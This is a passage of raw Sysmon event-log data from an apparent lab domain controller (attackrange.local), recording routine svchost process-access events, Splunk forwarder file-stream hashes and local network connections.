13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200276Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:09.755{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD3F6D88489FECFE7A2EBA285810A57,SHA256=F493193092C0AB5E17D24B1118EA917CDF0AF50A30DE1D871DE1234AAF05701F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200277Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:10.786{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A63539C872293DFAEEBA54F17CDCA658,SHA256=8276F186A375D3B6700A19EEBED5772CD9B8DA8FB3481934C19708B5EAFBD16F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200280Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:11.802{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B67F5D4E99E8E329129A83A154FF31F,SHA256=DE76AFBE775DF65872C767D416CA71C134D7ACAA92BDB5F61055326E506C76AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200279Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:07.984{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55115-false10.0.1.12-8000- 23542300x80000000000000002200278Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:11.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=844783DA39F1FE164DA816586A9106A5,SHA256=B1D2A595D4720AD7215D4EEBF48F347C0A8B73265CEF76DFB47CBA69B34018F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200281Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:12.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E40A830BC3DBFB40142F7DC84B7C1DE3,SHA256=402D4FD2CB22CBFBA78887630CCE0A952E290F72D0515175279463E6A2C947F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200283Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:13.864{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4219A06391CF331A3D97AC2974658395,SHA256=50B5A0EF9741975C542F3B88D669CCE55EC5EE5812C21F79B5730A571F668DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200282Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:13.083{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C584DD3338B4C4EF81B8603E02608152,SHA256=20A2EFFCA53A665253ED4EFC943A77AF6CE7EBCA72ACC75039C9089DF6A51BDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200286Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:11.313{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55116-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002200285Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:11.313{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55116-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 23542300x80000000000000002200284Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:14.536{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA3426AAA5F09F054370A211997DB736,SHA256=B0D4768159B170A7F6AD74C477C7533D2D7973CF5F93F58DE4F4244B4EE53B27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200291Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:15.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=83C5521071E7788A741A6707559160EF,SHA256=13DC1DAB41B8AB33D985ACD10103E6E4319821445FB015FCE92437768D341156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200290Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:15.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B14395832A99DBD9EB64C04B05146D59,SHA256=B9DCB04A6BF50D4AC3BEC649DD89851F23442230F95121C22D7F34E157F408A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200289Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:15.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FF31A0B7553C08B0DACE190C88C7075F,SHA256=9962FCB9D944E4D4F8D16C98790862AD03AD59A988B59CA31F1B0506E3994F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200288Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:15.208{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=04EFE3176B7C74FA14A086353683E9C4,SHA256=CDA621D59A16B151BAF2AF4B191618491B9449BDB197C6680D130A051EA42AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200287Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:15.114{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=868923FA0B1954489F9C19262BC4C023,SHA256=85D806A1C267007DA78FABDC920F640369B756C9B5A0986B120287227965F606,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200295Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:12.983{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55117-false10.0.1.12-8000- 23542300x80000000000000002200294Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=62E7FA28E3C279C5B5FD228A95CC6D7C,SHA256=F0529AE62A23DBB2E70B125AC6B86CB4505A4CE4B492856261FF559A80D80A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200293Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B9AFDD1A7A1A15379790718CA932789,SHA256=27ACD00E4AB2E9F661C384B260AAF8A1BD985AD6794B6EF2149EBE4CE2454153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200292Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:16.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7734A1931FC10CEAE487DD88FCC95903,SHA256=0681FF38F79FE63618A30688C8A1CAFF619BFCBA76C4751CB9F8BCD2841FAABD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200304Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:17.552{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E64D-6040-D64D-00000000AD01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200303Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 